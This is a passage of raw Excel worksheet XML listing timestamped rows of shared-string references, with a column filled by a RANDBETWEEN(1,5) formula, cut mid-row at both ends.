        <v>4</v>
      </c>
    </row>
    <row r="16100" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A16100" s="1">
        <v>43207.516018518516</v>
      </c>
      <c r="C16100" t="s">
        <v>65</v>
      </c>
      <c r="D16100" t="s">
        <v>232</v>
      </c>
      <c r="E16100" s="2" t="s">
        <v>14500</v>
      </c>
      <c r="F16100">
        <f t="shared" ca="1" si="251"/>
        <v>2</v>
      </c>
    </row>
    <row r="16101" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16101" s="1">
        <v>43207.507395833331</v>
      </c>
      <c r="C16101" t="s">
        <v>10</v>
      </c>
      <c r="D16101" t="s">
        <v>494</v>
      </c>
      <c r="E16101" t="s">
        <v>14501</v>
      </c>
      <c r="F16101">
        <f t="shared" ca="1" si="251"/>
        <v>3</v>
      </c>
    </row>
    <row r="16102" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16102" s="1">
        <v>43207.501863425925</v>
      </c>
      <c r="C16102" t="s">
        <v>6</v>
      </c>
      <c r="D16102" t="s">
        <v>114</v>
      </c>
      <c r="E16102" t="s">
        <v>14502</v>
      </c>
      <c r="F16102">
        <f t="shared" ca="1" si="251"/>
        <v>3</v>
      </c>
    </row>
    <row r="16103" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16103" s="1">
        <v>43207.491886574076</v>
      </c>
      <c r="C16103" t="s">
        <v>10</v>
      </c>
      <c r="D16103" t="s">
        <v>36</v>
      </c>
      <c r="E16103" t="s">
        <v>14503</v>
      </c>
      <c r="F16103">
        <f t="shared" ca="1" si="251"/>
        <v>2</v>
      </c>
    </row>
    <row r="16104" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16104" s="1">
        <v>43207.482581018521</v>
      </c>
      <c r="C16104" t="s">
        <v>10</v>
      </c>
      <c r="D16104" t="s">
        <v>17</v>
      </c>
      <c r="E16104" t="s">
        <v>14504</v>
      </c>
      <c r="F16104">
        <f t="shared" ca="1" si="251"/>
        <v>4</v>
      </c>
    </row>
    <row r="16105" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16105" s="1">
        <v>43207.476724537039</v>
      </c>
      <c r="C16105" t="s">
        <v>69</v>
      </c>
      <c r="D16105" t="s">
        <v>1160</v>
      </c>
      <c r="E16105" s="2" t="s">
        <v>14505</v>
      </c>
      <c r="F16105">
        <f t="shared" ca="1" si="251"/>
        <v>5</v>
      </c>
    </row>
    <row r="16106" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16106" s="1">
        <v>43207.468726851854</v>
      </c>
      <c r="C16106" t="s">
        <v>10</v>
      </c>
      <c r="D16106" t="s">
        <v>17</v>
      </c>
      <c r="E16106" t="s">
        <v>14506</v>
      </c>
      <c r="F16106">
        <f t="shared" ca="1" si="251"/>
        <v>3</v>
      </c>
    </row>
    <row r="16107" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16107" s="1">
        <v>43207.463125000002</v>
      </c>
      <c r="C16107" t="s">
        <v>10</v>
      </c>
      <c r="D16107" t="s">
        <v>17</v>
      </c>
      <c r="E16107" t="s">
        <v>14507</v>
      </c>
      <c r="F16107">
        <f t="shared" ca="1" si="251"/>
        <v>4</v>
      </c>
    </row>
    <row r="16108" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16108" s="1">
        <v>43207.459930555553</v>
      </c>
      <c r="C16108" t="s">
        <v>6</v>
      </c>
      <c r="D16108" t="s">
        <v>25</v>
      </c>
      <c r="E16108" t="s">
        <v>14508</v>
      </c>
      <c r="F16108">
        <f t="shared" ca="1" si="251"/>
        <v>2</v>
      </c>
    </row>
    <row r="16109" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16109" s="1">
        <v>43207.456574074073</v>
      </c>
      <c r="C16109" t="s">
        <v>10735</v>
      </c>
      <c r="D16109" t="s">
        <v>94</v>
      </c>
      <c r="E16109" s="2" t="s">
        <v>14509</v>
      </c>
      <c r="F16109">
        <f t="shared" ca="1" si="251"/>
        <v>1</v>
      </c>
    </row>
    <row r="16110" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16110" s="1">
        <v>43207.456192129626</v>
      </c>
      <c r="C16110" t="s">
        <v>10</v>
      </c>
      <c r="D16110" t="s">
        <v>667</v>
      </c>
      <c r="E16110" t="s">
        <v>14510</v>
      </c>
      <c r="F16110">
        <f t="shared" ca="1" si="251"/>
        <v>4</v>
      </c>
    </row>
    <row r="16111" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16111" s="1">
        <v>43207.45108796296</v>
      </c>
      <c r="C16111" t="s">
        <v>48</v>
      </c>
      <c r="E16111" s="2" t="s">
        <v>14511</v>
      </c>
      <c r="F16111">
        <f t="shared" ca="1" si="251"/>
        <v>4</v>
      </c>
    </row>
    <row r="16112" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A16112" s="1">
        <v>43207.438900462963</v>
      </c>
      <c r="C16112" t="s">
        <v>344</v>
      </c>
      <c r="E16112" s="2" t="s">
        <v>14512</v>
      </c>
      <c r="F16112">
        <f t="shared" ca="1" si="251"/>
        <v>3</v>
      </c>
    </row>
    <row r="16113" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A16113" s="1">
        <v>43207.432442129626</v>
      </c>
      <c r="C16113" t="s">
        <v>71</v>
      </c>
      <c r="E16113" s="2" t="s">
        <v>14513</v>
      </c>
      <c r="F16113">
        <f t="shared" ca="1" si="251"/>
        <v>1</v>
      </c>
    </row>
    <row r="16114" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A16114" s="1">
        <v>43207.423877314817</v>
      </c>
      <c r="C16114" t="s">
        <v>4852</v>
      </c>
      <c r="D16114" t="s">
        <v>817</v>
      </c>
      <c r="E16114" s="2" t="s">
        <v>14514</v>
      </c>
      <c r="F16114">
        <f t="shared" ca="1" si="251"/>
        <v>2</v>
      </c>
    </row>
    <row r="16115" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16115" s="1">
        <v>43207.418599537035</v>
      </c>
      <c r="C16115" t="s">
        <v>50</v>
      </c>
      <c r="E16115" t="s">
        <v>14515</v>
      </c>
      <c r="F16115">
        <f t="shared" ca="1" si="251"/>
        <v>2</v>
      </c>
    </row>
    <row r="16116" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A16116" s="1">
        <v>43207.407407407409</v>
      </c>
      <c r="C16116" t="s">
        <v>41</v>
      </c>
      <c r="E16116" s="2" t="s">
        <v>14516</v>
      </c>
      <c r="F16116">
        <f t="shared" ca="1" si="251"/>
        <v>1</v>
      </c>
    </row>
    <row r="16117" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16117" s="1">
        <v>43207.401458333334</v>
      </c>
      <c r="C16117" t="s">
        <v>10</v>
      </c>
      <c r="D16117" t="s">
        <v>178</v>
      </c>
      <c r="E16117" t="s">
        <v>14517</v>
      </c>
      <c r="F16117">
        <f t="shared" ca="1" si="251"/>
        <v>2</v>
      </c>
    </row>
    <row r="16118" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A16118" s="1">
        <v>43207.395335648151</v>
      </c>
      <c r="C16118" t="s">
        <v>712</v>
      </c>
      <c r="D16118" t="s">
        <v>52</v>
      </c>
      <c r="E16118" s="2" t="s">
        <v>14518</v>
      </c>
      <c r="F16118">
        <f t="shared" ca="1" si="251"/>
        <v>4</v>
      </c>
    </row>
    <row r="16119" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A16119" s="1">
        <v>43207.388287037036</v>
      </c>
      <c r="C16119" t="s">
        <v>10</v>
      </c>
      <c r="D16119" t="s">
        <v>46</v>
      </c>
      <c r="E16119" s="2" t="s">
        <v>14519</v>
      </c>
      <c r="F16119">
        <f t="shared" ca="1" si="251"/>
        <v>4</v>
      </c>
    </row>
    <row r="16120" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A16120" s="1">
        <v>43207.380844907406</v>
      </c>
      <c r="C16120" t="s">
        <v>222</v>
      </c>
      <c r="E16120" s="2" t="s">
        <v>14520</v>
      </c>
      <c r="F16120">
        <f t="shared" ca="1" si="251"/>
        <v>5</v>
      </c>
    </row>
    <row r="16121" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16121" s="1">
        <v>43207.363506944443</v>
      </c>
      <c r="C16121" t="s">
        <v>808</v>
      </c>
      <c r="E16121" t="s">
        <v>14521</v>
      </c>
      <c r="F16121">
        <f t="shared" ca="1" si="251"/>
        <v>3</v>
      </c>
    </row>
    <row r="16122" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16122" s="1">
        <v>43207.362199074072</v>
      </c>
      <c r="C16122" t="s">
        <v>48</v>
      </c>
      <c r="E16122" s="2" t="s">
        <v>14522</v>
      </c>
      <c r="F16122">
        <f t="shared" ca="1" si="251"/>
        <v>1</v>
      </c>
    </row>
    <row r="16123" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16123" s="1">
        <v>43207.357916666668</v>
      </c>
      <c r="C16123" t="s">
        <v>1064</v>
      </c>
      <c r="D16123" t="s">
        <v>993</v>
      </c>
      <c r="E16123" t="s">
        <v>14270</v>
      </c>
      <c r="F16123">
        <f t="shared" ca="1" si="251"/>
        <v>5</v>
      </c>
    </row>
    <row r="16124" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A16124" s="1">
        <v>43207.348981481482</v>
      </c>
      <c r="C16124" t="s">
        <v>41</v>
      </c>
      <c r="E16124" s="2" t="s">
        <v>14523</v>
      </c>
      <c r="F16124">
        <f t="shared" ca="1" si="251"/>
        <v>1</v>
      </c>
    </row>
    <row r="16125" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16125" s="1">
        <v>43207.343761574077</v>
      </c>
      <c r="C16125" t="s">
        <v>333</v>
      </c>
      <c r="E16125" t="s">
        <v>14524</v>
      </c>
      <c r="F16125">
        <f t="shared" ca="1" si="251"/>
        <v>1</v>
      </c>
    </row>
    <row r="16126" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A16126" s="1">
        <v>43207.330185185187</v>
      </c>
      <c r="C16126" t="s">
        <v>48</v>
      </c>
      <c r="E16126" s="2" t="s">
        <v>14525</v>
      </c>
      <c r="F16126">
        <f t="shared" ca="1" si="251"/>
        <v>1</v>
      </c>
    </row>
    <row r="16127" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16127" s="1">
        <v>43207.326342592591</v>
      </c>
      <c r="C16127" t="s">
        <v>69</v>
      </c>
      <c r="D16127" t="s">
        <v>82</v>
      </c>
      <c r="E16127" s="2" t="s">
        <v>14526</v>
      </c>
      <c r="F16127">
        <f t="shared" ca="1" si="251"/>
        <v>3</v>
      </c>
    </row>
    <row r="16128" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16128" s="1">
        <v>43207.324583333335</v>
      </c>
      <c r="C16128" t="s">
        <v>1064</v>
      </c>
      <c r="D16128" t="s">
        <v>25</v>
      </c>
      <c r="E16128" t="s">
        <v>14270</v>
      </c>
      <c r="F16128">
        <f t="shared" ca="1" si="251"/>
        <v>3</v>
      </c>
    </row>
    <row r="16129" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16129" s="1">
        <v>43207.322743055556</v>
      </c>
      <c r="C16129" t="s">
        <v>69</v>
      </c>
      <c r="D16129" t="s">
        <v>23</v>
      </c>
      <c r="E16129" s="2" t="s">
        <v>14527</v>
      </c>
      <c r="F16129">
        <f t="shared" ca="1" si="251"/>
        <v>2</v>
      </c>
    </row>
    <row r="16130" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16130" s="1">
        <v>43207.321944444448</v>
      </c>
      <c r="C16130" t="s">
        <v>318</v>
      </c>
      <c r="E16130" s="2" t="s">
        <v>14528</v>
      </c>
      <c r="F16130">
        <f t="shared" ref="F16130:F16193" ca="1" si="252">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="16131" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A16131" s="1">
        <v>43207.319409722222</v>
      </c>
      <c r="C16131" t="s">
        <v>71</v>
      </c>
      <c r="E16131" s="2" t="s">
        <v>14529</v>
      </c>
      <c r="F16131">
        <f t="shared" ca="1" si="252"/>
        <v>1</v>
      </c>
    </row>
    <row r="16132" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16132" s="1">
        <v>43207.312685185185</v>
      </c>
      <c r="C16132" t="s">
        <v>3027</v>
      </c>
      <c r="D16132" t="s">
        <v>229</v>
      </c>
      <c r="E16132" t="s">
        <v>14530</v>
      </c>
      <c r="F16132">
        <f t="shared" ca="1" si="252"/>
        <v>4</v>
      </c>
    </row>
    <row r="16133" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16133" s="1">
        <v>43207.303703703707</v>
      </c>
      <c r="C16133" t="s">
        <v>10735</v>
      </c>
      <c r="D16133" t="s">
        <v>750</v>
      </c>
      <c r="E16133" s="2" t="s">
        <v>14531</v>
      </c>
      <c r="F16133">
        <f t="shared" ca="1" si="252"/>
        <v>1</v>
      </c>
    </row>
    <row r="16134" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A16134" s="1">
        <v>43207.29855324074</v>
      </c>
      <c r="C16134" t="s">
        <v>63</v>
      </c>
      <c r="D16134" t="s">
        <v>312</v>
      </c>
      <c r="E16134" s="2" t="s">
        <v>14532</v>
      </c>
      <c r="F16134">
        <f t="shared" ca="1" si="252"/>
        <v>3</v>
      </c>
    </row>
    <row r="16135" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16135" s="1">
        <v>43207.296053240738</v>
      </c>
      <c r="C16135" t="s">
        <v>1064</v>
      </c>
      <c r="D16135" t="s">
        <v>41</v>
      </c>
      <c r="E16135" t="s">
        <v>14270</v>
      </c>
      <c r="F16135">
        <f t="shared" ca="1" si="252"/>
        <v>1</v>
      </c>
    </row>
    <row r="16136" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16136" s="1">
        <v>43207.285011574073</v>
      </c>
      <c r="C16136" t="s">
        <v>10</v>
      </c>
      <c r="D16136" t="s">
        <v>178</v>
      </c>
      <c r="E16136" t="s">
        <v>14533</v>
      </c>
      <c r="F16136">
        <f t="shared" ca="1" si="252"/>
        <v>2</v>
      </c>
    </row>
    <row r="16137" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A16137" s="1">
        <v>43207.263425925928</v>
      </c>
      <c r="C16137" t="s">
        <v>314</v>
      </c>
      <c r="D16137" t="s">
        <v>312</v>
      </c>
      <c r="E16137" s="2" t="s">
        <v>14534</v>
      </c>
      <c r="F16137">
        <f t="shared" ca="1" si="252"/>
        <v>4</v>
      </c>
    </row>
    <row r="16138" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16138" s="1">
        <v>43207.237962962965</v>
      </c>
      <c r="C16138" t="s">
        <v>10735</v>
      </c>
      <c r="D16138" t="s">
        <v>602</v>
      </c>
      <c r="E16138" s="2" t="s">
        <v>14535</v>
      </c>
      <c r="F16138">
        <f t="shared" ca="1" si="252"/>
        <v>1</v>
      </c>
    </row>
    <row r="16139" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A16139" s="1">
        <v>43207.227303240739</v>
      </c>
      <c r="C16139" t="s">
        <v>197</v>
      </c>
      <c r="D16139" t="s">
        <v>194</v>
      </c>
      <c r="E16139" s="2" t="s">
        <v>14536</v>
      </c>
      <c r="F16139">
        <f t="shared" ca="1" si="252"/>
        <v>1</v>
      </c>
    </row>
    <row r="16140" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A16140" s="1">
        <v>43207.216851851852</v>
      </c>
      <c r="C16140" t="s">
        <v>4852</v>
      </c>
      <c r="D16140" t="s">
        <v>36</v>
      </c>
      <c r="E16140" s="2" t="s">
        <v>14537</v>
      </c>
      <c r="F16140">
        <f t="shared" ca="1" si="252"/>
        <v>5</v>
      </c>
    </row>
    <row r="16141" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16141" s="1">
        <v>43207.196111111109</v>
      </c>
      <c r="C16141" t="s">
        <v>10735</v>
      </c>
      <c r="D16141" t="s">
        <v>7</v>
      </c>
      <c r="E16141" t="s">
        <v>14406</v>
      </c>
      <c r="F16141">
        <f t="shared" ca="1" si="252"/>
        <v>5</v>
      </c>
    </row>
    <row r="16142" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A16142" s="1">
        <v>43207.187071759261</v>
      </c>
      <c r="C16142" t="s">
        <v>461</v>
      </c>
      <c r="E16142" s="2" t="s">
        <v>14538</v>
      </c>
      <c r="F16142">
        <f t="shared" ca="1" si="252"/>
        <v>1</v>
      </c>
    </row>
    <row r="16143" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A16143" s="1">
        <v>43207.173449074071</v>
      </c>
      <c r="C16143" t="s">
        <v>65</v>
      </c>
      <c r="E16143" s="2" t="s">
        <v>14539</v>
      </c>
      <c r="F16143">
        <f t="shared" ca="1" si="252"/>
        <v>2</v>
      </c>
    </row>
    <row r="16144" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16144" s="1">
        <v>43207.16684027778</v>
      </c>
      <c r="C16144" t="s">
        <v>60</v>
      </c>
      <c r="E16144" t="s">
        <v>14540</v>
      </c>
      <c r="F16144">
        <f t="shared" ca="1" si="252"/>
        <v>3</v>
      </c>
    </row>
    <row r="16145" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A16145" s="1">
        <v>43207.15834490741</v>
      </c>
      <c r="C16145" t="s">
        <v>197</v>
      </c>
      <c r="E16145" s="2" t="s">
        <v>14541</v>
      </c>
      <c r="F16145">
        <f t="shared" ca="1" si="252"/>
        <v>4</v>
      </c>
    </row>
    <row r="16146" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16146" s="1">
        <v>43207.143252314818</v>
      </c>
      <c r="C16146" t="s">
        <v>10735</v>
      </c>
      <c r="D16146" t="s">
        <v>192</v>
      </c>
      <c r="E16146" s="2" t="s">
        <v>14542</v>
      </c>
      <c r="F16146">
        <f t="shared" ca="1" si="252"/>
        <v>4</v>
      </c>
    </row>
    <row r="16147" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16147" s="1">
        <v>43207.121053240742</v>
      </c>
      <c r="C16147" t="s">
        <v>73</v>
      </c>
      <c r="D16147" t="s">
        <v>312</v>
      </c>
      <c r="E16147" t="s">
        <v>14543</v>
      </c>
      <c r="F16147">
        <f t="shared" ca="1" si="252"/>
        <v>5</v>
      </c>
    </row>
    <row r="16148" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A16148" s="1">
        <v>43207.116030092591</v>
      </c>
      <c r="C16148" t="s">
        <v>65</v>
      </c>
      <c r="D16148" t="s">
        <v>330</v>
      </c>
      <c r="E16148" s="2" t="s">
        <v>14544</v>
      </c>
      <c r="F16148">
        <f t="shared" ca="1" si="252"/>
        <v>4</v>
      </c>
    </row>
    <row r="16149" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A16149" s="1">
        <v>43207.105138888888</v>
      </c>
      <c r="C16149" t="s">
        <v>71</v>
      </c>
      <c r="D16149" t="s">
        <v>312</v>
      </c>
      <c r="E16149" s="2" t="s">
        <v>14545</v>
      </c>
      <c r="F16149">
        <f t="shared" ca="1" si="252"/>
        <v>2</v>
      </c>
    </row>
    <row r="16150" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16150" s="1">
        <v>43207.099305555559</v>
      </c>
      <c r="C16150" t="s">
        <v>410</v>
      </c>
      <c r="E16150" t="s">
        <v>14546</v>
      </c>
      <c r="F16150">
        <f t="shared" ca="1" si="252"/>
        <v>4</v>
      </c>
    </row>
    <row r="16151" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16151" s="1">
        <v>43207.092210648145</v>
      </c>
      <c r="C16151" t="s">
        <v>69</v>
      </c>
      <c r="D16151" t="s">
        <v>11</v>
      </c>
      <c r="E16151" t="s">
        <v>14547</v>
      </c>
      <c r="F16151">
        <f t="shared" ca="1" si="252"/>
        <v>3</v>
      </c>
    </row>
    <row r="16152" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16152" s="1">
        <v>43207.082233796296</v>
      </c>
      <c r="C16152" t="s">
        <v>10735</v>
      </c>
      <c r="D16152" t="s">
        <v>56</v>
      </c>
      <c r="E16152" s="2" t="s">
        <v>14548</v>
      </c>
      <c r="F16152">
        <f t="shared" ca="1" si="252"/>
        <v>5</v>
      </c>
    </row>
    <row r="16153" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A16153" s="1">
        <v>43206.829641203702</v>
      </c>
      <c r="C16153" t="s">
        <v>1440</v>
      </c>
      <c r="D16153" t="s">
        <v>367</v>
      </c>
      <c r="E16153" s="2" t="s">
        <v>14549</v>
      </c>
      <c r="F16153">
        <f t="shared" ca="1" si="252"/>
        <v>5</v>
      </c>
    </row>
    <row r="16154" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A16154" s="1">
        <v>43206.805810185186</v>
      </c>
      <c r="C16154" t="s">
        <v>73</v>
      </c>
      <c r="D16154" t="s">
        <v>89</v>
      </c>
      <c r="E16154" s="2" t="s">
        <v>14550</v>
      </c>
      <c r="F16154">
        <f t="shared" ca="1" si="252"/>
        <v>2</v>
      </c>
    </row>
    <row r="16155" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16155" s="1">
        <v>43206.801886574074</v>
      </c>
      <c r="C16155" t="s">
        <v>10735</v>
      </c>
      <c r="D16155" t="s">
        <v>2214</v>
      </c>
      <c r="E16155" t="s">
        <v>14406</v>
      </c>
      <c r="F16155">
        <f t="shared" ca="1" si="252"/>
        <v>3</v>
      </c>
    </row>
    <row r="16156" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16156" s="1">
        <v>43206.775995370372</v>
      </c>
      <c r="C16156" t="s">
        <v>10</v>
      </c>
      <c r="D16156" t="s">
        <v>80</v>
      </c>
      <c r="E16156" t="s">
        <v>14551</v>
      </c>
      <c r="F16156">
        <f t="shared" ca="1" si="252"/>
        <v>5</v>
      </c>
    </row>
    <row r="16157" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16157" s="1">
        <v>43206.757453703707</v>
      </c>
      <c r="C16157" t="s">
        <v>63</v>
      </c>
      <c r="D16157" t="s">
        <v>330</v>
      </c>
      <c r="E16157" t="s">
        <v>14497</v>
      </c>
      <c r="F16157">
        <f t="shared" ca="1" si="252"/>
        <v>5</v>
      </c>
    </row>
    <row r="16158" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A16158" s="1">
        <v>43206.754108796296</v>
      </c>
      <c r="C16158" t="s">
        <v>10</v>
      </c>
      <c r="D16158" t="s">
        <v>80</v>
      </c>
      <c r="E16158" s="2" t="s">
        <v>14552</v>
      </c>
      <c r="F16158">
        <f t="shared" ca="1" si="252"/>
        <v>3</v>
      </c>
    </row>
    <row r="16159" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16159" s="1">
        <v>43206.751921296294</v>
      </c>
      <c r="C16159" t="s">
        <v>10</v>
      </c>
      <c r="D16159" t="s">
        <v>52</v>
      </c>
      <c r="E16159" t="s">
        <v>14553</v>
      </c>
      <c r="F16159">
        <f t="shared" ca="1" si="252"/>
        <v>3</v>
      </c>
    </row>
    <row r="16160" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16160" s="1">
        <v>43206.730879629627</v>
      </c>
      <c r="C16160" t="s">
        <v>6728</v>
      </c>
      <c r="D16160" t="s">
        <v>80</v>
      </c>
      <c r="E16160" s="2" t="s">
        <v>14554</v>
      </c>
      <c r="F16160">
        <f t="shared" ca="1" si="252"/>
        <v>3</v>
      </c>
    </row>
    <row r="16161" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16161" s="1">
        <v>43206.70826388889</v>
      </c>
      <c r="C16161" t="s">
        <v>48</v>
      </c>
      <c r="E16161" t="s">
        <v>14555</v>
      </c>
      <c r="F16161">
        <f t="shared" ca="1" si="252"/>
        <v>2</v>
      </c>
    </row>
    <row r="16162" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16162" s="1">
        <v>43206.681238425925</v>
      </c>
      <c r="C16162" t="s">
        <v>71</v>
      </c>
      <c r="D16162" t="s">
        <v>750</v>
      </c>
      <c r="E16162" s="2" t="s">
        <v>14556</v>
      </c>
      <c r="F16162">
        <f t="shared" ca="1" si="252"/>
        <v>4</v>
      </c>
    </row>
    <row r="16163" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16163" s="1">
        <v>43206.651446759257</v>
      </c>
      <c r="C16163" t="s">
        <v>10</v>
      </c>
      <c r="D16163" t="s">
        <v>86</v>
      </c>
      <c r="E16163" t="s">
        <v>14557</v>
      </c>
      <c r="F16163">
        <f t="shared" ca="1" si="252"/>
        <v>5</v>
      </c>
    </row>
    <row r="16164" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16164" s="1">
        <v>43206.645972222221</v>
      </c>
      <c r="C16164" t="s">
        <v>48</v>
      </c>
      <c r="E16164" t="s">
        <v>14558</v>
      </c>
      <c r="F16164">
        <f t="shared" ca="1" si="252"/>
        <v>3</v>
      </c>
    </row>
    <row r="16165" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16165" s="1">
        <v>43206.62400462963</v>
      </c>
      <c r="C16165" t="s">
        <v>9633</v>
      </c>
      <c r="D16165" t="s">
        <v>163</v>
      </c>
      <c r="E16165" s="2" t="s">
        <v>14559</v>
      </c>
      <c r="F16165">
        <f t="shared" ca="1" si="252"/>
        <v>3</v>
      </c>
    </row>
    <row r="16166" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16166" s="1">
        <v>43206.618877314817</v>
      </c>
      <c r="C16166" t="s">
        <v>60</v>
      </c>
      <c r="E16166" s="2" t="s">
        <v>14560</v>
      </c>
      <c r="F16166">
        <f t="shared" ca="1" si="252"/>
        <v>3</v>
      </c>
    </row>
    <row r="16167" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16167" s="1">
        <v>43206.605879629627</v>
      </c>
      <c r="C16167" t="s">
        <v>10</v>
      </c>
      <c r="D16167" t="s">
        <v>80</v>
      </c>
      <c r="E16167" t="s">
        <v>14561</v>
      </c>
      <c r="F16167">
        <f t="shared" ca="1" si="252"/>
        <v>4</v>
      </c>
    </row>
    <row r="16168" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16168" s="1">
        <v>43206.602372685185</v>
      </c>
      <c r="C16168" t="s">
        <v>10735</v>
      </c>
      <c r="D16168" t="s">
        <v>817</v>
      </c>
      <c r="E16168" t="s">
        <v>14406</v>
      </c>
      <c r="F16168">
        <f t="shared" ca="1" si="252"/>
        <v>1</v>
      </c>
    </row>
    <row r="16169" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16169" s="1">
        <v>43206.569606481484</v>
      </c>
      <c r="C16169" t="s">
        <v>10</v>
      </c>
      <c r="D16169" t="s">
        <v>178</v>
      </c>
      <c r="E16169" t="s">
        <v>14562</v>
      </c>
      <c r="F16169">
        <f t="shared" ca="1" si="252"/>
        <v>4</v>
      </c>
    </row>
    <row r="16170" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16170" s="1">
        <v>43206.56832175926</v>
      </c>
      <c r="C16170" t="s">
        <v>10</v>
      </c>
      <c r="D16170" t="s">
        <v>178</v>
      </c>
      <c r="E16170" t="s">
        <v>14563</v>
      </c>
      <c r="F16170">
        <f t="shared" ca="1" si="252"/>
        <v>4</v>
      </c>
    </row>
    <row r="16171" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16171" s="1">
        <v>43206.551516203705</v>
      </c>
      <c r="C16171" t="s">
        <v>1050</v>
      </c>
      <c r="E16171" t="s">
        <v>14564</v>
      </c>
      <c r="F16171">
        <f t="shared" ca="1" si="252"/>
        <v>2</v>
      </c>
    </row>
    <row r="16172" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16172" s="1">
        <v>43206.547222222223</v>
      </c>
      <c r="C16172" t="s">
        <v>461</v>
      </c>
      <c r="F16172">
        <f t="shared" ca="1" si="252"/>
        <v>4</v>
      </c>
    </row>
    <row r="16173" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A16173" s="1">
        <v>43206.546030092592</v>
      </c>
      <c r="C16173" t="s">
        <v>43</v>
      </c>
      <c r="E16173" s="2" t="s">
        <v>14565</v>
      </c>
      <c r="F16173">
        <f t="shared" ca="1" si="252"/>
        <v>4</v>
      </c>
    </row>
    <row r="16174" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16174" s="1">
        <v>43206.515659722223</v>
      </c>
      <c r="C16174" t="s">
        <v>71</v>
      </c>
      <c r="D16174" t="s">
        <v>94</v>
      </c>
      <c r="E16174" s="2" t="s">
        <v>14566</v>
      </c>
      <c r="F16174">
        <f t="shared" ca="1" si="252"/>
        <v>4</v>
      </c>
    </row>
    <row r="16175" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16175" s="1">
        <v>43206.5075462963</v>
      </c>
      <c r="C16175" t="s">
        <v>10</v>
      </c>
      <c r="D16175" t="s">
        <v>6</v>
      </c>
      <c r="E16175" t="s">
        <v>14567</v>
      </c>
      <c r="F16175">
        <f t="shared" ca="1" si="252"/>
        <v>1</v>
      </c>
    </row>
    <row r="16176" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A16176" s="1">
        <v>43206.501296296294</v>
      </c>
      <c r="C16176" t="s">
        <v>71</v>
      </c>
      <c r="E16176" s="2" t="s">
        <v>14568</v>
      </c>
      <c r="F16176">
